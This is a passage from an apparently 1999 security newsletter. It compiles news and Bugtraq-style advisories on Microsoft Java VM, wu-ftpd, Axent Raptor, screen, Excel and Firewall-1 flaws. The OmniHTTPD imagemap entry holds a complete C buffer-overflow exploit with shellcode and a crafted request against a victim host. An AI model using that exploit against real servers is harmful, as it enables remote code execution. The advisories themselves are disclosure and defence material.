wrote about an ecological dissaster with roots in Y2K solving - Trying a dose of preventive medicine, Alexian Brothers Medical Center in Elk Grove Village prepared for a possible Y2K power outage by pumping up the diesel fuel tanks that power the hospital's electrical generators. But the hospital's good intentions backfired earlier this month when the tanks received more fuel than they could hold. The overflow--2,000 gallons--seeped through an underground drain tile, through a series of storm sewers and, finally, into a retention pond surrounded by luxury homes @HWA 58.0 ANTI-MS SOFTWARE ~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ, Saturday 23rd October 1999 on 1:04 am CET Revenge of Mozilla is the first utility to completely remove Internet Explorer from Windows 98. The first version of Revenge of Mozilla was a companion for 98Lite, finishing the job that 98Lite left behind. It was created due to a strong demand for an application that would 1) Remove IE in it's entirety, 2) Do it *all* in one shot, 3) Not require fussing with a DOS-based application prior to installing Windows98, and 4) Be completely free of charge for the web community to enjoy. http://www.silverlink.net/~jensenba/rom2/ @HWA 59.0 HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Friday 22nd October 1999 on 8:20 pm CET Within the last couple weeks, Microsoft has unveiled their new Passport service which allows you to log in to multiple sites and do your work with one single login. However, they failed to realize that not all people allow all cookies everywhere to be put on their computer. It is possible by making a settings change in Netscape (and possibly IE) to transparently let a user log in as the last user that used Hotmail on that computer. Microsoft is investigating the problem but noted that it's a problem within the Passport sign-out service and added that the Passport wallet service is not vulnerable. 60.0 Books: Hacking Exposed: Network Security Secrets and Solutions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.securityfocus.com/ Hacking Exposed: Network Security Secrets and Solutions by George Kurtz , Stuart McClure and Joel Scambray Type: book ISBN: 0072121270 Year: 1999 Buy it! Defend your network against the sneakiest hacks and latest attacks. In this must-have handbook, security experts Stuart McClure, Joel Scambray, and George Kurtz give you the full scoop on some of the most highly publicized and insidious break-ins and show you how to implement bulletproof security on your system. All aspects of network security are included from informational scans and probes to password vulnerabilities, dialup networking insecurities, buffer overflows, Web and email insecurities, trojans, and back doors. Hacking Exposed: Network Security Secrets and Solutions covers all security, auditing, and intrusion detection procedures for UNIX (including Linux), Windows NT/95/98, and Novell networks. The bonus companion web site (www.hackingexposed.com) contains custom scanning scripts and links to security tools. Foreword by industry expert Marcus Ranum, CEO of Network Flight Recorder (NFR). Here's what security experts are saying about "Hacking Exposed". "Understanding how to mount and create attacks is the only way you can protect against existing and, more importantly, future attacks. The information contained herein arms those on the defensive (security admin, network architects, software developers, etc) with this knowledge. It is refreshing to see this sort of material finally being made available to the general public." - Dr. Mudge of Lopht security research group, developers of the Lophtcrack NT password auditing tool "My experience in securing systems is that most users are shocked when they find out how vulnerable they really are. Perhaps this book will shock you. No matter what, it will educate you." - Marcus Ranum, CEO of Network Flight Recorder "The authors have put together an excellent up-to-date resource on modern security vulnerabilities. Rather than simply documenting a few case studies and talking about problems on a macro scale, the authors build up a robust framework and dissect the security issues completely. Each vulnerability covered has detailed countermeasure information. More than a how-to manual, it's a how-to-do-it-right manual. A book like this has been needed for quite some time now." - Mike D. Schiffman ("Route"), Security Researcher and Author of the Firewalk tool "Hacking Exposed is a gut wrenching look at the security techniques used in computer penetration. The authors provide an up to date and comprehensive view of the methods that hackers use to compromise your networks. If this book doesn't scare and motivate you to take security seriously, nothing will." - Aleph One, Moderator of the Bugtraq Security Mailing List "This book is destined to be a classic. Unlike most other security books, this explains details on hacker tools - why they are used, how they work, and how best to protect yourself from them. The underground already knows this stuff, and this book helps the sys admin see their systems through the intruder's eyes." - Simple Nomad, Renowned Security Researcher and Author of The Hack FAQ Learn to: Find, exploit, and apply countermeasures for security holes in Unix, Linux, Windows NT/95/98, and Novell networks Repair email and Web security holes (CGI, Perl, ASP, browsers, and hostile mobile code) Understand how back channels and port redirection are used to circumvent firewalls Locate and scan for vulnerable systems using Whois, Domain Name System queries, Ping Sweeps, Port Scans, and OS detection Enumerate users, groups, shares, file systems, and services with no authentication. Crack accounts and passwords, escalate privilege, and exploit trusts Find and eliminate back doors, Trojan horses, viruses, and buffer overflows Implement auditing and intrusion detection solutions Recognize vulnerabilities from dialup modems, modem pools, and RAS servers. @HWA 61.0 Microsoft Java Virtual Machine Class Cast Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.securityfocus.com/ bugtraq id 740 class Failure to Handle Exceptional Conditions cve GENERIC-MAP-NOMATCH remote Yes local Yes published October 22, 1999 updated October 22, 1999 vulnerable Microsoft Virtual Machine 3000.0 Series + Microsoft Internet Explorer 5.0 for Windows NT 4.0 + Microsoft Windows NT 4.0 + Microsoft Internet Explorer 5.0 for Windows 98 + Microsoft Windows 98 + Microsoft Internet Explorer 5.0 for Windows 95 + Microsoft Windows 95 + Microsoft Internet Explorer 5.0 for Windows 2000 - Microsoft Windows NT 2000.0 Microsoft Virtual Machine 2000.0 Series + Microsoft Internet Explorer 4.0 for Windows NT 4.0 + Microsoft Windows NT 4.0 + Microsoft Internet Explorer 4.0 for Windows NT 3.51 - Microsoft Windows NT 3.5.1 + Microsoft Internet Explorer 4.0 for Windows 98 + Microsoft Windows 98 + Microsoft Internet Explorer 4.0 for Windows 95 + Microsoft Windows 95 not vulnerable Microsoft Virtual Machine 3188.0.0 and up - Microsoft Internet Explorer 5.0 for Windows NT 4.0 + Microsoft Windows NT 4.0 - Microsoft Internet Explorer 5.0 for Windows 98 + Microsoft Windows 98 - Microsoft Internet Explorer 5.0 for Windows 95 + Microsoft Windows 95 - Microsoft Internet Explorer 5.0 for Windows 2000 - Microsoft Windows NT 2000.0 - Microsoft Internet Explorer 4.0 for Windows NT 4.0 + Microsoft Windows NT 4.0 - Microsoft Internet Explorer 4.0 for Windows NT 3.51 - Microsoft Windows NT 3.5.1 - Microsoft Internet Explorer 4.0 for Windows 98 + Microsoft Windows 98 - Microsoft Internet Explorer 4.0 for Windows 95 + Microsoft Windows 95 The Virtual Machine is a component of various programs and operating systems that handles the execution of Java code. All Microsoft VMs with build numbers between 2000 and 3187 inclusive have been found to contain a weakness whereby a Java applet could take any action on the local machine that the user could take. This is possible because the MS VM allows 'cast', or conversion, operations to be done on classes, which creates the opportunity for a 'public' class to be converted to 'private', thereby increasing the privileges of the code within that class. This action could not be coded in a regular java compiler, but the java binary could be edited spoecifically to cause the cast operation Microsoft has released a new build that is not subject to this vulnerability, available at: http://www.microsoft.com/java/vm/dl_vm32.htm credit Publicized in Microsoft Security Bulletin MS99-045, released on Oct 21, 1999. reference advisory: MS99-045: Patch Available "Virtual Machine Verifier" Vulnerability (MS) web page: Microsoft Security Bulletin (MS99-045): Frequently Asked Questions (Microsoft) web page: Microsoft Virtual Machine (Microsoft) @HWA 62.0 OmniHTTPD Buffer Overflow Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 739 class Boundary Condition Error cve GENERIC-MAP-NOMATCH remote Yes local No published October 22, 1999 updated October 22, 1999 vulnerable Omnicron OmniHTTPD 2.4Pro Omnicron OmniHTTPD 1.1 There is a remotely exploitable buffer overflow vulnerability in the CGI program "imagemap", which is distributed with Omnicron's OmniHTTPD. During operations made on arguments passed to the program, a lack of bounds checking on a strcpy() call can allow for arbitrary code to be executed on the machine running the server. /*============================================================================= Imagemap 1.00.00 CGI Exploit (Distributed with OmniHTTPd 1.01 and Pro2.04) The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #define MAXBUF 2000 #define RETADR 348 #define JMPADR 344 #define HTTP_PORT 80 unsigned int mems[]={ 0xBFB50000, 0xBFB72FFF, 0xBFDE0000, 0xBFDE5FFF, 0xBFE00000, 0xBFE0FFFF, 0xBFE30000, 0xBFE42FFF, 0xBFE80000, 0xBFE85FFF, 0xBFE90000, 0xBFE95FFF, 0xBFEA0000, 0xBFF1EFFF, 0xBFF20000, 0xBFF46FFF, 0xBFF50000, 0xBFF60FFF, 0xBFF70000, 0xBFFC5FFF, 0xBFFC9000, 0xBFFE2FFF, 0,0}; unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe"; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,ip,p1,p2; static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)HTTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; for (i=0;;i+=2){ if (mems[i]==0) return FALSE; if ((ip=search_mem((unsigned char *)mems[i], (unsigned char *)mems[i+1],0xff,0xe3))!=0) break; } buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06; strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE; } Since source code for the imagemap program is supplied, UNYUN of Shadow Penguin Security suggests that checking for oversized arguments be added to the code: void main(int argc, char **argv) { ----------- omit ---------- char OutString[100]; ----------- omit ---------- if(argc >= 2) { // // extract x & y from passed values // strcpy(OutString, argv[1]); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Buffer overflow caused by this strcpy(). This overflow can be avoided if you put the following code before strcpy(). if (strlen(argv[1])>99) exit There are no known vendor provided solutions to this problem. credit Posted to BugTraq by UNYUN on Oct 22, 1999. reference web page: Omnicron Homepage (Omnicron Technologies Corporation) http://www.omnicron.ab.ca message: Imagemap CGI overflow exploit (UNYUN ) http://www.securityfocus.com/templates/archive.pike?list=1&msg=380FFD9429E.0DA9SHADOWPENGUIN@fox.nightland.net @HWA 63.0 Linux cwdtools Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 738 class Unknown cve GENERIC-MAP-NOMATCH remote No local Yes published October 22, 1999 updated October 22, 1999 vulnerable S.u.S.E. Linux 6.2 S.u.S.E. Linux 6.1 cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. S.u.S.E offers patched packages at the location below: ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/cdwtools-0.93-101.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/cdwtools-0.93-100.i386.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.1/ap1/cdwtools-0.93-101.alpha.rpm credit This bug was apparently discovered by Brock Tellier and published in a S.u.S.E advisory on Oct 20, 1999. reference advisory: SuSE-025: All Linux distributions using cdwtools (SuSE) http://www.securityfocus.com/templates/advisory.html?id=1803 web page: S.u.S.E. Patches/Fixes (S.u.S.E.) http://http://www.suse.de/de/support/download/updates/index.html @HWA 64.0 WU-Ftpd NEW DoS vulnerabilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 737 class Failure to Handle Exceptional Conditions cve GENERIC-MAP-NOMATCH remote Yes local No published October 21, 1999 updated October 21, 1999 vulnerable Washington University wu-ftpd 2.5 + RedHat Linux 6.1 not vulnerable Washington University wu-ftpd 2.6.0 It may be possible for remote users to cause wu-ftpd to consume large amounts of memory, creating a denial of service. If users can upload files, arbitrary code can be executed with the uid of the ftpd (usually root) You can upgrade to the newest version of Wu-ftpd (2.6) for any vulnerable platform. RedHat has released patches available at the following locations: Red Hat Linux 4.2 - ----------------- Intel: ftp://updates.redhat.com//4.2/i386/wu-ftpd-2.6.0-0.4.2.i386.rpm Alpha: ftp://updates.redhat.com//4.2/alpha/wu-ftpd-2.6.0-0.4.2.alpha.rpm Sparc: ftp://updates.redhat.com//4.2/sparc/wu-ftpd-2.6.0-0.4.2.sparc.rpm Source packages: ftp://updates.redhat.com//4.2/SRPMS/wu-ftpd-2.6.0-0.4.2.src.rpm Red Hat Linux 5.2 - ----------------- Intel: ftp://updates.redhat.com//5.2/i386/wu-ftpd-2.6.0-0.5.x.i386.rpm Alpha: ftp://updates.redhat.com//5.2/alpha/wu-ftpd-2.6.0-0.5.x.alpha.rpm Sparc: ftp://updates.redhat.com//5.2/sparc/wu-ftpd-2.6.0-0.5.x.sparc.rpm Source packages: ftp://updates.redhat.com//5.2/SRPMS/wu-ftpd-2.6.0-0.5.x.src.rpm Red Hat Linux 6.x - ----------------- Intel: ftp://updates.redhat.com//6.0/i386/wu-ftpd-2.6.0-1.i386.rpm Alpha: ftp://updates.redhat.com//6.0/alpha/wu-ftpd-2.6.0-1.alpha.rpm Sparc: ftp://updates.redhat.com//6.0/sparc/wu-ftpd-2.6.0-1.sparc.rpm Source packages: ftp://updates.redhat.com//6.0/SRPMS/wu-ftpd-2.6.0-1.src.rpm credit Released in CERT advisory CA-99-13, posted to BugTraq on Oct 19, 1999 and originally AUSCERT advisory AA-99.02, published on Oct 19, 1999. reference advisory: CA-99-13: Multiple Vulnerabilities in WU-FTPD (CERT) http://www.securityfocus.com/templates/advisory.html?id=1797 advisory: AA-99.02: Multiple Vulnerabilities in wu-ftpd based daemons (AusCERT) http://www.securityfocus.com/templates/advisory.html?id=1799 advisory: RHSA-1999:043-01: Security problems in WU-FTPD (RedHat) http://www.securityfocus.com/templates/advisory.html?id=1801 web page: Updates, Fixes, and Errata Page (RedHat) http://www.redhat.com/corp/support/errata/index.html CA-99-13: Multiple Vulnerabilities in WU-FTPD Published: Tue Oct 19 1999 Updated: Tue Oct 19 1999 CERT Advisory CA-99-13 Multiple Vulnerabilities in WU-FTPD Original release date: October 19, 1999 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running the WU-FTPD daemon or its derivatives I. Description Three vulnerabilities have been identified in WU-FTPD and other ftp daemons based on the WU-FTPD source code. WU-FTPD is a common package used to provide File Transfer Protocol (FTP) services. Incidents involving at least the first of these vulnerabilities have been reported to the CERT Coordination Center. Vulnerability #1: MAPPING_CHDIR Buffer Overflow Because of improper bounds checking, it is possible for an intruder to overwrite static memory in certain configurations of the WU-FTPD daemon. The overflow occurs in the MAPPING_CHDIR portion of the source code and is caused by creating directories with carefully chosen names. As a result, FTP daemons compiled without the MAPPING_CHDIR option are not vulnerable. This is the same vulnerability described in AUSCERT Advisory AA-1999.01, which is available from ftp://www.auscert.org.au/security/advisory/AA-1999.01.wu-ftpd.mapping_ chdir.vul This is not the same vulnerability as the one described in CA-99-03 "FTP Buffer Overflows", even though it is closely related. Systems that have patches to correct the issue described in CA-99-03 may still be vulnerable to this problem. Vulnerability #2: Message File Buffer Overflow Because of improper bounds checking during the expansion of macro variables in the message file, intruders may be able to overwrite the stack of the FTP daemon. This is one of the vulnerabilities described in AUSCERT Advisory AA-1999.02, which is available from ftp://www.auscert.org.au/security/advisory/AA-1999.02.multi.wu-ftpd.vu ls Vulnerability #3: SITE NEWER Consumes Memory The SITE NEWER command is a feature specific to WUFTPD designed to allow mirroring software to identify all files newer than a supplied date. This command fails to free memory under some circumstances. II. Impact Vulnerability #1: MAPPING_CHDIR Buffer Overflow Remote and local intruders may be able exploit this vulnerability to execute arbitrary code as the user running the ftpd daemon, usually root. To exploit this vulnerability, the intruder must be able to create directories on the vulnerable systems that are accessible via FTP. While remote intruders are likely to have this privilege only through anonymous FTP access, local users may be able to create the required directories in their own home directories. Vulnerability #2: Message File Buffer Overflow Remote and local intruders may be able exploit this vulnerability to execute arbitrary code as the user running the ftpd daemon, usually root. If intruders are able to control the contents of a message file, they can successfully exploit this vulnerability. This access is frequently available to local users in their home directories, but it may be restricted in anonymous FTP access, depending on your configuration. Additionally, under some circumstances, remote intruders may be able to take advantage of message files containing macros provided by the FTP administrator. Vulnerability #3: SITE NEWER Consumes Memory Remote and local intruders who can connect to the FTP server can cause the server to consume excessive amounts of memory, preventing normal system operation. If intruders can create files on the system, they may be able exploit this vulnerability to execute arbitrary code as the user running the ftpd daemon, usually root. III. Solution Install appropriate patches from your vendor These vulnerabilities can be eliminated by applying appropriate patches from your vendor. We encourage you to apply a patch as soon as possible and to disable vulnerable programs until you can do so. Disabling the WU-FTPD daemon may prevent your system from operating normally. Upgrading to WU-FTPD 2.6.0 may cause some inter-operability problems with certain FTP clients. We encourage you to review the WU-FTPD documentation carefully before performing this upgrade. Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Until you can install a patch, you can apply the following workarounds. Vulnerability #1: MAPPING_CHDIR Buffer Overflow This vulnerability can be corrected by compiling the WU-FTPD daemon without the MAPPING_CHDIR option. Exploitation by anonymous remote intruders can be mitigated by limiting write access, but this solution is not encouraged. Vulnerability #2: Message File Buffer Overflow Remote exploitation of this vulnerability can be mitigated and possibly eliminated by removing macros from message files until a patch can be applied. Vulnerability #3: SITE NEWER Consumes Memory There are currently no workarounds available. Appendix A. Vendor Information Data General DG/UX is not vulnerable to this problem. FreeBSD FreeBSD has updated its wuftpd and proftpd ports to correct this problem as of August 30, 1999. Users of these ports are encouraged to upgrade their installation to these newer versions of these ports as soon as possible. IBM Corporation AIX is not vulnerable. It does not ship wu-ftpd. IBM and AIX are registered trademarks of International Business Machines Corporation. OpenBSD OpenBSD does not use (and never will use) wuftpd or any of its derivatives. Santa Cruz Operation, Inc. Security patches for SCO UnixWare 7.x, SCO UnixWare 2.x, and OpenServer 5.x will be made available at http://www.sco.com/security. SGI SGI IRIX and Unicos do not ship with wu-ftpd, so they are not vulnerable. As a courtesy, unsupported pre-compiled IRIX inst images for wu-ftpd are available from http://freeware.sgi.com/ which may be vulnerable. When the freeware products are next updated, they should contain the latest wu-ftpd code which should include the security fixes. SGI Linux 1.0 which is based on RedHat 6.0 ships with wu-ftpd rpms. When new wu-ftpd rpms are available for RedHat 6.0, they can be installed on SGI Linux 1.0. SGI NT Workstations do not ship with wu-ftpd. Sun Sun is not vulnerable. WU-FTPD and BeroFTPD Vulnerability #1: Not vulnerable: versions 2.4.2 and all betas and earlier versions Vulnerable: wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15 wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17 wu-ftpd-2.5.0 BeroFTPD, all versions Vulnerability #2: Not vulnerable: wu-ftpd-2.6.0 Vulnerable: All versions of wuarchive-ftpd and wu-ftpd prior to version 2.6.0, from wustl.edu, academ.com, vr.net and wu-ftpd.org. BeroFTPD, all versions Vulnerability #3: Not vulnerable: wu-ftpd-2.6.0 Vulnerable: All versions of wuarchive-ftpd and wu-ftpd prior to version 2.6.0, from wustl.edu, academ.com, vr.net and wu-ftpd.org. BeroFTPD, all versions With version 2.6.0, the major functionality of BeroFTPD has been merged back into the WU-FTPD daemon. Development of BeroFTPD has ceased; there will be no upgrades or patches. Users are advised to upgrade to WU-FTPD version 2.6.0. WU-FTPD Version 2.6.0 is available for download from mirrors arround the world. A full list of mirrors is available from: ftp://ftp.wu-ftpd.org/pub/README-MIRRORS The current version of WU-FTPD (presently 2.6.0) is also available from the primary distribution site: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.gz ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.Z _________________________________________________________________ The CERT Coordination Center would like to thank Gregory Lundberg (a member of the WU-FTPD development group) and AUSCERT their assistance in preparing this advisory. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-99-13-wuftpd.html @HWA 65.0 Axent Raptor Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.securityfocus.com/ bugtraq id 736 class Failure to Handle Exceptional Conditions cve GENERIC-MAP-NOMATCH remote Yes local No published October 21, 1999 updated October 21, 1999 vulnerable Axent Raptor 6.0 It is possible to remotely lock Axent Raptor firewalls by sending them packets with malformed IP options fields. According to an advisory posted to bugtraq by the perdue CERIAS labs, setting the SECURITY and TIMESTAMP IP options length to 0 can cause an infinite loop to occur within the code that handles the options (resulting in the software freezing). A consequence of this is a remote denial of service. Axent has released a hotfix for this problem which is available at: ftp://ftp.raptor.com/patches/V6.0/6.02Patch/ credit This was discovered by the CERIAS labs at perdue (cs.perdue.edu) and posted to BugTraq on October 21, 1999. reference message: Remote DoS in Axent's Raptor 6.0 (Mike Frantzen ) To: BugTraq Subject: Remote DoS in Axent's Raptor 6.0 Date: Wed Oct 20 1999 04:45:56 Author: Mike Frantzen Message-ID: <199910202245.RAA28104@expert.cc.purdue.edu> This bug was discovered in the CERIAS lab's at Purdue by: Florian Kerschbaum Mike Frantzen Thanks to the Purdue CERIAS Firewall group: Stephanie Miller Florian Kerschbaum Mike Frantzen Eric Hlutke Hendry Lim Environment: Sparc 5 85MHz Solaris 2.6 Generic_105181-12 Axent Raptor 6.0.0 Firewall Thesis: Axent's Raptor programmers have a switch statement for IP Options in a packet. They likely have cases for most of the options contained in the RFC's but only wrote handling code for the commonly 'malused' options (source routing). For all the other known options, they are handled by a generic routine which likely tries to skip that option. See probable code snapshot below. Background: IP Options are (generally) of the form: -------- -------- -------- -------- | Type | Length | ... | ... | -------- -------- -------- -------- Where the Type indicates which IP Option is present and the Length obviously indicates how long the option is. It also needs to be pointed out that there can be multiple options inside an IP packet -- they just follow each other. Problem: IP Packets are parsed either with interrupts masked off or while holding an vital global mutex. When the option parsing tries to skip a 'benign' option, it forgets to check if it is of zero length. So the end result is essentially: for (ecx = 20; ecx < header_length; ecx += 0 ) { ... } The Options that can lock up the firewall are the Timestamp option and the Security option. The copy bit does not appear to affect the results. Nor does the underlying protocol (TCP, UDP or random). Solution one: Learn to power cycle your firewall ;-) Solution two: Block all traffic with IP Options at your screening router. Solution three: Apply Axent's Hotfix ftp://ftp.raptor.com/patches/V6.0/6.02Patch/ Sidenote one: Axent received the bug and responded _swiftly_. I was extremely impressed. Sidenote two: Out of respect to the way Axent handled the bug (and the fact they are a CERIAS Sponsor), we are not releasing an exploit. This is the probable offending segment of code in Raptor. It is only an educated guess--I have not seen their code nor have I disassembled it. [.....] /* Parse the IP Options of the packet */ for (c = 20; c < (ip.ip_hl * 4); ) { switch ( packet[c] & ~COPY_BIT ) { case TIMESTAMP: case SECURITY: if ( c + 1 > ip.ip_hl * 4 ) goto done_parsing_label; option_length = packet[c + 1]; /* ****************************** **** * Forgetting to check if the option length is * zero here. So you enter an infinite loop * ****************************** ****/ if ( option_length + c > ip.ip_hl * 4 ) goto done_parsing_label; c += option_length; break; case END_OF_OPTIONS: goto done_parsing_label; case NOP: c++; break; case STRICT_SOURCE_ROUTE: case LOOSE_SOURCE_ROUTE: case RECORD_ROUTE: log_dangerous_packet(); default: if ( c + 1 >= ip.ip_hl * 4 ) goto done_parsing_label; option_length = packet[c + 1]; if ( (option_length == 0) ||(option_length + c >= ip.ip_hl * 4) ) goto done_parsing_label; c += option_length; break; } } done_parsing_label: queue_packet_down_stack(packet); unmask_interrupts(); [.....] @HWA 66.0 RedHat screen pty(7) Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 732 object screen (exec) class Origin Validation Error cve GENERIC-MAP-NOMATCH remote No local Yes published October 21, 1999 updated October 21, 1999 vulnerable RedHat Linux 6.1 not vulnerable RedHat Linux 6.0.0 RedHat Linux 5.2.0 RedHat Linux 5.1.0 RedHat Linux 5.0.0 RedHat Linux 4.2.0 RedHat Linux 4.1.0 RedHat Linux 4.0.0 RedHat Linux 3.0.3 RedHat Linux 2.1.0 RedHat Linux 2.0.0 The version of screen which ships with Redhat Linux 6.1 sets incorrect permissions on the pty (pseudo-terminal driver). The pty driver provides support for a pair of devices collectively known as a pseudo-terminal. The two devices comprising a pseudo-terminal are known as a controller and a slave. Instead of having a hardware interface and associated hardware that supports the terminal functions, the functions are implemented by another process manipulating the controller device of the pseudo-terminal. These pty's are represented as a regular file on the UNIX filesystem. As a result of poor permission settings, these pty's are world writable thus allowing other users to hijack other users pty's and execute commands as the user whose pty has been stolen. This can result in root privileges if 'root' is running the vulnerable version of screen. Redhat has made the following RPMS available which address this problem: Red Hat Linux 6.1: Intel: ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/screen-3.9.4-3.i386.rpm Source package: ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/screen-3.9.4-3.src.rpm credit This bug was discovered by Chris Evans and posted as a Redhat advisory (RHSA-1999:042-01) to the Bugtraq mailing list by Bill Nottingham on Wed, 20 Oct 1999. reference advisory: RHSA-1999:042-01: screen defaults to not using Unix98 ptys (RedHat) http://www.securityfocus.com/templates/advisory.html?id=1800 web page: Updates, Fixes, and Errata Page (RedHat) http://www.redhat.com/corp/support/errata/index.html @HWA 67.0 Microsoft Excel File Import Macro Execution Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 728 class Design Error cve GENERIC-MAP-NOMATCH remote Unknown local Yes published October 20, 1999 updated October 20, 1999 vulnerable Microsoft Excel 97 SR2 Microsoft Excel 97 SR1 Microsoft Excel 97 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 Microsoft Office 97 - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows NT 4.0 When a Lotus 1-2-3 or Quattro Pro file containing a macro is opened by Excel 97, the user is not warned that a macro will be executed upon opening the file (as is customary when Excel opens other spreedsheet files containing macros.) Microsoft has released a patch for this vulnerability. It is available at: - Excel 97: http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm - Excel 2000: http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm credit The vulnerability was reported to Microsoft by David Young of Derby, UK. reference advisory: MS99-044: Patch Available for "Excel SYLK" Vulnerability (MS) http://www.securityfocus.com/templates/advisory.html?id=1798 web page: Microsoft Security Bulletin MS99-044: Frequently Asked Questions (Microsoft) http://www.microsoft.com/security/bulletins/MS99-044faq.asp web page: Q241900: XL97: Opening Lotus 1-2-3 File May Execute Macro Without Warning (Microsoft) http://support.microsoft.com/support/kb/articles/q241/9/00.asp @HWA 68.0 Checkpoint Firewall-1 LDAP Authentication Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 725 class Access Validation Error cve GENERIC-MAP-NOMATCH remote Yes local No published October 20, 1999 updated October 20, 1999 vulnerable Checkpoint Software Firewall-1 4.0 not vulnerable Checkpoint Software Firewall-1 3.0.0 With FireWall-1 Version 4.0 Checkpoint introduced support for the Lightweight Directory Access Protocol (LDAP) for user authentication. It looks like there's a bug in Checkpoint's ldap code which under certain circumstances can lead to unauthorized access to protected systems behind the firewall. A user can authenticate himself at the firewall providing a valid username and password. The firewall acts as a ldap client, validating the credentials by a directory server using the ldap protocol. After successful authentication access will be granted to systems protected by the firewall. In contrast to authentication using the Radius or SecurID protocol, after successful authentication the directory server can supply the firewall with additional ldap attributes for the user like the time and day of a week a user is allowed to login, the source addresses a user can run a client from, or the system behind the firewall a user is allowed to access. This can be done individual for each user. In general I think that's a great idea but it seems Checkpoint made something wrong interpreting the ldap attribute 'fw1allowed-dst' which is supposed to control in detail which protected network object a user can access. It seems this attribute is ignored by the firewall software, granting access to all protected network 